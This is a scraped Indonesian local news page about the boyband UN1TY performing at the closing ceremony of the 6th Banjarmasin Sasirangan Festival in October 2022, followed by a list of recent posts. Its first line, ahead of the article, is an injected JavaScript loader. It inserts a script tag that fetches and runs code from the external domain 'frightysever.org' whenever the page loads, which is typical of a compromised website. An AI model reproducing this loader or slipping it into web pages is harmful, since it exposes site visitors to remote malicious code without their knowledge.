(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarmasin

UN1TY Jadi Magnet Ribuan Warga Banjarmasin pada Closing Ceremony BSF ke-6


KANALKALIMANTAN.COM, BANJARMASINUN1TY menjadi salah satu penampil dalam Malam Puncak Closing Ceremony Banjarmasin Sasirangan Festival (BSF) ke-6, di Sering Balaikota Banjarmasin, Sabtu (1/10/2022) malam.

Boyband Indonesia yang digawangi 8 member tersebut berhasil menjadi magnet tersendiri bagi ribuan warga Kota Banjarmasin.

Namun diketahui saat acara Closing Ceremony ini mereka hanya tampil ber-7 saja, lantaran salah seorang anggotanya, yakini Ricky sedang sakit.

Meskipun tanpa Ricky, UN1TY tetap tampil sangat memukau dengan aksi maksimalnya. Mereka juga sangat menawan dengan memakai kemeja yang dipadu padankan dengan cardigan berwarna-warni.

 

 

Baca juga: Xenia ‘Misterius’ Tanpa Nopol Ditinggal Pemilik Usai Terbalik Depan ULM Banjarbaru

UN1TY membawakan sederet tembang miliknya. Salah satunya adalah lagu andalannya yang berjudul ‘Coba Cintaku’. Mereka bernyayi dan menari menyapa para penonton. Hal tersebut membuat para fans berteriak karena dapat melihat idolanya lebih dekat.

Setelah penampilan memukaunya, UN1TY turut berbincang hingga bersanda gurau dengan para fans dan ribuan warga Kota Banjarmasin yang memadati panggung Balaikota.

Penampilan penyanyi solo Indonesia Nabila Maharani memeriahkan malam puncak Closing Ceremony BSF ke-6, di Siring Balaikota Banjarmasin. Foto: wanda

Saat berbincang tersebut, salah satu anggota Fiki mengatakan bahwa dirinya sangat bahagia bisa tampil di acara tersebut, karena itu adalah kali pertama dirinya dan anggotanya bertandang ke Kota Banjarmasin.

Ia pun mengucapkan terima kasih kerena dipercaya menjadi bagian dalam pagelaran dari salah satu stasiun televisi di Indonesia.

Baca juga: TERUNGKAP. Penyebab Jatuhnya Kontainer Tewaskan Dua Orang Pengemudi di Tanbu

“Karena pertama kalinya kita ke Banjarmasin langsung bisa melihat fans kita rasanya luar biasa dan sangat bersemangat atas penampilan malam ini. Terimakasih sudah mengundang kita sampai bertemu lagi Banjarmasin,” ucap Fiki, salah satu member Boyband UN1TY dengan rendah hati kepada ribuan penonton Closing Ceremony BSF ke-6, Sabtu (1/10/2022).

Tak hanya itu, Boyband yang diketuai oleh Farhan itu menuturkan sangat mengapresiasi musisi Indonesia sehingga mereka pun turut meramaikan lagu Boybend Coboy Junior berjudul ‘Kamu’.

Boyband UN1TY tentunya menjadi tamu spesial besama dengan deretan selebriti lainnya yakni Nabila Maharani seorang penyanyi solo asal Yogyakarta.

Band lokal asal Kalimantan Selatan pun turut memeriahkan penutupan rangkaian acara Hari Jadi Kota Banjarmasin ke-496 ini. Seperti band bernama Suara Selatan Borneo meramaikan dengan melakukan karaoke lagu-lagu hits musisi Indonesia. (kanalkalimantan.com/wanda)

Reporter : wanda
Editor: cell


Risa

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

5 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

5 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

6 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

6 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

6 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

6 jam ago

This website uses cookies.